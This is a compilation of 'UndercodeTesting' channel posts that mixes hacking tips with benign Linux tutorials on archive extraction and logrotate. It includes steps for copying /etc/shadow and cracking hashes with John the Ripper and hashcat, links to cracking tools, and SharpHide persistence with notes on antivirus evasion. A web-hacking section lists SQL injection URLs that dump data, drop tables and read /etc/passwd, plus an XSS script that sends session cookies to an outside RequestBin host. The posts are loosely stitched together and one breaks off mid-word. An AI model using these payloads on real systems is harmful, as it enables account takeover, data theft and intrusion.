▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑FREE WINDOWS PASSWORD CRACKER:

100% recovery rate.
Easy to install and use with a very handy and clear user interface.
Resets passwords with a bootable CD/DVD.
Resets passwords with a bootable USB drive.
Resets local Administrator password.
Retrieve product keys from unbootable Windows installations.
WinPE Recovery CD Builder.
Automatically detects several operating systems installed on the computer.
Unlocks and Enables user accounts.
Disables the password expiry option.
Supports Windows 2000, XP, Vista, 7, Windows 8, Windows 8.1, Windows 10.
Works on all laptops including Legend, Toshiba, Dell, IBM etc.
Supports 32-bit and 64-bit Windows.
Support WinPE USB boot disk.
Added options to special WinPE version and type while building boot disk
Added options to special custom drivers while building boot disk
Enhanced password recovery for Windows 8, Windows 8.1, Windows 10
Create UEFI boot USB disk/CD/DVD
Supports Windows 10 x86
Supports Windows 10 x64
Enhanced guides for resetting Windows Live ID user account password
Recover Windows 8/8.1 OEM product key from BIOS
Start Menu on boot disk
FREE technical support.

Download : https://www.lazesoft.com/downloads/lsrmphdsetup.exe

How to use
https://youtu.be/68jkBLKIJas

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to Crack Linux Password Hash :
using JohnTheripper:

1) Example of Linux Password Hash:

$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ

$1 = MD5 hashing algorithm.

$2 =Blowfish Algorithm is in use.

$2a=eksblowfish Algorithm

$5 =SHA-256 Algorithm

$6 =SHA-512 Algorithm

2) So this is MD5 hash

3) The second field is salt value so e7NfNpNi is the salt

4) The last field is the hash value of salt+user password i.e A6nCwOTqrNR2oDuIKirRZ

5) Now comes the cracking part. But unless this is a common hash which it isn’t you can’t decrypt it.

6) You can use Johntheripper to crack the password. This might take a long time if you are keyspace bruteforcing. If you want you can use a dictionary based attack to crack it. To do this first you
need to setup the hash file.

cp /etc/passwd ./

cp /etc/shadow ./

7) unshadow passwd shadow > hashes

8) After this you can do one of the following

9) Dictionary Based Cracking

john -w /path/to/wordlist — format=md5crypt hashes

10) Key-space Brute-forcing
john — show hashes

🦑Other Methods :

1) If you have access to a GPU, you can harness its power for your
cracking process. For this you can use hash-cat.
hashcat -m 1800 -a 0 [Path-to-Hashes] [Path-to-Word-list] -o [Path-to-Output-Cracked-Hashes]

2) you can set m to either 500 or 1800, depending on your setup.
(mediuM
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Again a new whatsapp vulnerability strike.
#Vulnerabilities

MORE INFO - https://undercodenews.com/again-a-new-whatsapp-vulnerability-strike/04/11/2020/

SO IMPORTANT IOS USERS »> UPDATE WHATSAPP

At any time you can visit, still under-construction in covid-19, UndercodeTesting.com

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 ALL REAL CRACKING TOOLS :

https://hashcat.net/hashcat/

http://www.openwall.com/john/

https://www.darknet.org.uk/2006/09/brutus-password-cracker-download-brutus-aet2zip-aet2/

https://www.thc.org/thc-hydra/

http://www.foofus.net/jmk/tools/medusa-2.1.1.tar.gz

http://ophcrack.sourceforge.net/tables.php

http://www.l0phtcrack.com/

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑What is Google Dork?

1) It is basically a search string that uses advanced search query to find information that are not easily available on the websites. It is also regarded as illegal google hacking activity which hackers often uses for purposes such as cyber terrorism and cyber theft.
Dork

2) They are like search criteria in which a search engine returns results related to your dork.

🦑Can Google be used by Hackers to hack websites?

1) People often take Google as just a search engine used to find text, images, videos, and news. However, in the infosec world, it has a very vast role. Google can also be used as a very useful hacking tool.

2) You cannot hack websites directly using Google. But, it’s tremendous web crawling capabilities can be of great help to index almost anything within any websites which includes sensitive information. This can include from username, password and other general vulnerabilities you won’t even be knowing.
Basically, using Google Dorking you can find vulnerabilities of any web applications and servers with the help of native Google Search engine.
(medium)
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑🐧 Bash function for extracting file archives of various types:

1) Bash function for extracting file archives of various types
Open your ~ / .bashrc file:

$ nano ~/.bashrc

2) Add the following snippet at the end:

# Bash Function To Extract File Archives Of Various Types
extract () {
if [ -f $1 ] ; then
case $1 in
*.tar.bz2) tar xjf $1 ;;
*.tar.gz) tar xzf $1 ;;
*.bz2) bunzip2 $1 ;;
*.rar) rar x $1 ;;
*.gz) gunzip $1 ;;
*.tar) tar xf $1 ;;
*.tbz2) tar xjf $1 ;;
*.tgz) tar xzf $1 ;;
*.zip) unzip $1 ;;
*.Z) uncompress $1 ;;
*.7z) 7z x $1 ;;
*) echo "'$1' cannot be extracted via extract()" ;;
esac
else
echo "'$1' is not a valid file"
fi
}

3) Press Ctrl + o and press ENTER to save the file and then press Ctrl + x to exit the file.

4) Run the following command for the changes to take effect:
$ source ~/.bashrc

5) From now on, you can simply call this function to extract archives of various types.

For example, I'm going to extract a .7z archive file using the command:

$ extract archive.7z

🦑Output example:

p7zip Version 16.02 (locale=en_IN,Utf16=on,HugeFiles=on,64 bits,4 CPUs Intel(R) Core(TM) i3-2350M CPU @ 2.30GHz (206A7),ASM)

7) Scanning the drive for archives:
1 file, 16013693 bytes (16 MiB)

8) Extracting archive: archive.7z
--
Path = archive.7z
Type = 7z
Physical Size = 16013693
Headers Size = 1204
Method = LZMA:23
Solid = +
Blocks = 1
Folders: 21
Files: 37
Size: 16625007
Compressed: 16013693

9) Likewise, to extract .zip files, the command would be:
$ extract archive.zip

10) Please note that you must install the appropriate archive manager before using this function.
If your system does not have supported archiving tools installed, you will receive an error message similar to the one below:
$ extract archive.zip

11) bash: /usr/bin/unzip: No such file or directory
This script is mentioned in many places on the Internet.

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑🐧 How to set up and manage log rotation using Logrotate on Linux:

A) Installing Logrotate on Linux
To install logrotate just use your package manager:

---------- On Debian and Ubuntu ----------
# aptitude update && aptitude install logrotate

---------- On CentOS, RHEL and Fedora ----------
# yum update && yum install logrotate

B) It is worth noting that the configuration file (/etc/logrotate.conf) may indicate that other, more specific settings can be placed in separate .conf files inside /etc/logrotate.d.
This will be the case if and only if the following line exists and is not commented out:

include /etc/logrotate.d

C) We will stick to this approach as it will help us keep things tidy and will use the Debian box for the following examples.
Configuring Logrotate on Linux

D) As a very versatile tool, logrotate provides many directives to help us customize when and how the logs will be rotated, and what should happen immediately afterwards.

Let's paste the following content into /etc/logrotate.d/apache2.conf (note that you will most likely need to create this file) and examine each line.

/ var / log / apache2 / * {
weekly
rotate 3
size 10M
compress
delaycompress
}

E) The first line indicates that the directives inside the block apply to all logs inside / var / log / apache2:
weekly means the tool will try to update the logs on a weekly basis. Other possible values ​​are daily and monthly.
rotate 3 indicates that only 3 rotations should be left. Thus, the oldest file will be deleted on the fourth subsequent run.
size = 10M sets the minimum size for rotation to 10M. In other words, each log will not rotate until it reaches 10MB.
compress and delaycompress are used to specify that all but the most recent logs being processed should be compressed.
Let's do a dry run to see what logrotate would do if it were actually executed now.
Use the -d option followed by the config file (you can run logrotate by omitting this option):

# logrotate -d /etc/logrotate.d/apache2.conf

F) Instead of compressing the logs, we could rename them according to the date they were edited.

G) To do this, we'll use the dateext directive.

If our date format is different from the default yyyymmdd, we can specify it using dateformat.

Note that we can even prevent rotation if the log is empty using notifempty.

Also, let's tell logrotate to send the updated log to the system administrator (in this case admin@mydomain.com) for his reference (this will require setting up a mail server, which is beyond the scope of this article).

H) This time we will only use /etc/logrotate.d/squid.conf for the /var/log/squid/access.log route:/var/log/squid/access.log {
monthly
create 0644 root root
rotate 5
size = 1M
dateext
dateformat -% d% m% Y
notifempty
mail admin@mydomain.com
}

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to Use The Mac OS X Hackers Toolbox :

Before we install Metasploit, we need to install some software dependencies. It is a little more work to install Metasploit on Mac OS X, but it will be worth it. Listed below are the prerequisite software packages.

🦑Software Prerequisites
MacPorts
Ruby1.9.3
Homebrew
PostgreSQL

🄻🄴🅃'🅂 🅂🅃🄰🅁🅃 :

1) MacPorts Installation Install Xcode
Xcode Install from the Apple App Store, or it can be downloaded from the following URL: https://developer.apple.com/xcode/
Once Xcode is installed, go into the Xcode preferences and install the “Command Line Tools”.

2) Install the MacPorts app

3) Download and install the package file (.dmg) file from the MacPorts web site: https://distfiles.macports.org/MacPorts/
Once the files are downloaded, install MacPorts. More information on MacPorts can be found here: http://www.macports.org/install.php

4) Run MacPorts selfupdate to make sure it is using the latest version.

5) From a terminal window run the following command:
$ sudo port selfupdate

6) Ruby 1.9.3
Mac OS X is preinstalled with Ruby, but we want to upgrade to Ruby 1.9.3

We will be using MacPorts to upgrade Ruby. From a terminal window run the following command:

$ sudo port install ruby19 +nosuffix

7) The default Ruby install path for MacPorts is: /opt/local/ It’s a good idea to verify that the PATH is correct, so that opt/local/bin is listed before /usr/bin. You should get back something that looks like this:

/opt/local/bin:/opt/local/sbin:/usr/bin:/bin:/usr/ sbin:/sbin

8) You can verify the path by entering the following syntax in a terminal window:

$ echo $PATH

9) To verify the Ruby install locations, enter this syntax:

$ which ruby gem

You should get back the following response:

/opt/local/bin/ruby /opt/local/bin/gem

Now ready to install hacking tools such metasploit and more ...

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Windows 7, still the second most common operating system, is not gone.
#Updates

Microsoft is upgrading the beta version of Excel for Mac.
#Technologies

Multiple GitLab security vulnerabilities could allow hackers to exploit logins and more.
#Vulnerabilities

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑BEST HTML AND CSS EDITORS FOR WINDOWS:

https://atom.io/

https://notepad-plus-plus.org/

https://www.sublimetext.com/

https://clk.tradedoubler.com/click?p=264355&a=3118363&g=24531572

https://code.visualstudio.com/#meet-intellisense

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑This can hack any windows
🦟 SharpHide: a tool to create hidden registry keys

1) Malware that runs without elevated privileges in Windows has limited ability to recover from a system reboot (called persistence).

Malware that elevates privileges using zero-day exploits or public exploits has more potential to persist.

However, zero days are expensive and risk exposing them, and public exploits will not work on patched systems.

2) Most malware gets stuck using well known save methods that are easy to detect.

The easiest save method is to write the value to HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Run (or a
similar key to HKEY_LOCAL_MACHINE).

3) The values ​​for this key are commands that Windows executes when the user logs on (in the case of HKEY_CURRENT_USER) or when it boots (in the case of HKEY_LOCAL_MACHINE).

The malicious program writes the path to its executable file into the Run key.

4) So it restores execution after reboot.

Since this is a well-known method, the suspicious value in the Run key is a red flag indicating that the system is infected.

It also reveals the location of malware on the system, making it very easy to collect samples for analysis.

5) FILE-FREE BINARY STORAGE

CONVENTIONAL STORAGE OF FILES ON DISK

Antivirus software scans files on the disk.

Antivirus software hashes files and sends signatures to the cloud.

Some antiviruses perform heuristic scans of files stored on the disk.

6) Suspected malware files can even be silently sent to the cloud.

To counter this, malware has several options.

Files on disk can be regular droppers that access the Internet and load more essential modules (which are loaded into memory without touching the disk).

Malicious programs can also create executable files that are stored on disk so as not to disable antivirus heuristics.

🦑For example, because antivirus often scans high-entropy segments in PE (which indicate compressed or encrypted data), malware can avoid using encryption and compression to protect its executable files.

Since the antivirus has heuristics that scans the import tables, malware can avoid importing suspicious functions.

Such countermeasures are burdensome for malware developers and, in any case, do not guarantee that their binaries will not be uploaded to the cloud.

Download && Use
https://github.com/outflanknl/SharpHide#usage

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑what is Browser hijacking ?

1) is a form of unwanted software that modifies a web browser's settings without a user's permission, to inject unwanted advertising into the user's browser. A browser hijacker may replace the existing home page, error page, or search engine with its own.

2) These are generally used to force hits to a particular website, increasing its advertising revenue.

3) Some browser hijackers also contain spyware, for example, some install a software keylogger to gather information such as banking and e-mail authentication details. Some browser hijackers can also damage the registry on Windows systems, often permanently.

Some browser hijacking can be easily reversed, while other instances may be difficult to reverse. Various software packages exist to prevent such modification.

4) Many browser hijacking programs are included in software bundles that the user did not choose, and are included as "offers" in the installer for another program, often included with no uninstall instructions, or documentation on what they do, and are presented in a way that is designed to be confusing for the average user, in order to trick them into installing unwanted extra software.

5) There are several methods that browser hijackers use to gain entry to an operating system. Email attachments and files downloaded through suspicious websites and torrents are common tactics that browser hijackers use.
wiki
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Web Hacking:

SQL Injection

XSS (Cross-Site Scripting)

Session Hijacking

1) git clone https://github.com/lambdacasserole/hack-this

2) cd hack-this

3) npm install
This will install Bower which will allow you to install the assets the website requires (Bootstrap, jQuery etc.) using the command:

4) bower install
Gulp will also have been installed. This will compile the Less and CoffeeScript into CSS and JS ready for production. Do this using the command:

gulp
This command will need running again every time you make a change to a Less file. If you're working on them, run gulp watch in a terminal to watch for file changes and compile accordingly.

5) Setup
To set everything up, you'll need to:

Import the file db.sql into your database

6) Modify the file db_configuration.php to correspond to your database
Access the site and get hacking

🦑EXAMPLES:

1) SQL Injection
In an SQL injection attack, malicious SQL statements are inserted into an entry field for execution (usually in a data-driven web application).

Get information for all users:
http://localhost/customers.php?username=leocadio'%20or%20'1'='1
http://localhost/customers.php?username=leocadio'%20or%20''='
http://localhost/customers.php?id=1%20or%201=1
Drop (destroy) invoices table:
http://localhost/customers.php?id=1;drop%20table%20invoices
Dump the password hash file from the server:
Unix: http://localhost/customers.php?username='%20UNION%20SELECT%201,1,1,1,LOAD_FILE('/etc/passwd'),'1
Dump several things at once (oh boy):
http://localhost/customers.php?username='%20UNION%20SELECT%201,2,3,4,5,'hello%20world
Bypass Login (SQL Injection)
It's possible to bypass login completely (logging in as whoever you like) by adding an always-true condition to the password check:

foo' or '1'='1

2) Session Hijacking (XSS)
Using a service like RequestBin it's possible to hijack user sessions by capturing their session cookie. Try sending a message to a user consisting of the following code (with {{ bin_id }} substituted out for your RequestBin bin ID).

<script>
var xmlHttp = new XMLHttpRequest();
xmlHttp.open("GET", "http://requestbin.fullcontact.com/{{ bin_id }}?c=" + document.cookie, false);
xmlHttp.send(null);
</script>

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑ANOTHER GOOD HASH CRACKING:

F E A T U R E S :

auto detect hash
supports windows and linux platforms
fast decrypt
list of supported hashes:
- md4
- md5
- sha1
- sha224
- sha256
- sha384
- sha512
- ripemd160
- whirlpool
- mysql 3.2.3
- mysql 4.1
- mssql2000
- mssql2005
- nthash
- lmhash
- ntlm hash

🄻🄴🅃'🅂 🅂🅃🄰🅁🅃 :

$ apt update upgrade

$ apt install python2 git

$ git clone https://github.com/ciku370/hasher

$ cd hasher

$ python2 hash.py

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Cisco IP Phone Security Vulnerability.
#Vulnerabilities

Moxa MXView vulnerability can cause an attacker to execute arbitrary commands.
#Vulnerabilities